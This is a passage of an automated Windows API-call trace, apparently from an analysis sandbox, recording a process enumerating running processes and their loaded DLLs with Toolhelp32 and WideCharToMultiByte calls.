	[0106.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.394] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.415] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.416] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.417] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.418] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.419] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.420] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.421] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.422] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 1
	[0106.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.422] Module32NextW (hSnapshot=0x868, lpme=0x20af280) returned 0
	[0106.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 10
	[0106.423] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0106.424] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf8c) returned 0x86c
	[0106.432] Module32FirstW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.433] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.433] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.434] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.435] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.436] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.436] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.437] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.438] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.439] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.440] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.445] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.446] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.447] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.448] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.448] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.449] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.450] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.451] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 0
	[0106.452] Module32FirstW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\WindowsPowerShell\\off-covered-playlist.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\WindowsPowerShell\\off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 66
	[0106.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 25
	[0106.452] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.468] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.469] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.470] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.470] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.471] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.472] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.473] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.474] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.475] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.475] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.476] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.477] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.478] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.479] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.480] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.481] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 1
	[0106.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.482] Module32NextW (hSnapshot=0x86c, lpme=0x20af280) returned 0
	[0106.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 25
	[0106.482] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0106.483] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfac) returned 0x870
	[0106.496] Module32FirstW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.497] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.498] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.499] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.500] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.500] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.501] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.502] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.503] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.504] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.505] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.505] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.506] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.522] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.522] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.523] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.524] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.525] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.525] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 0
	[0106.526] Module32FirstW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Google\\bryant.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Google\\bryant.exe", lpUsedDefaultChar=0x0) returned 41
	[0106.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 11
	[0106.527] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.528] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
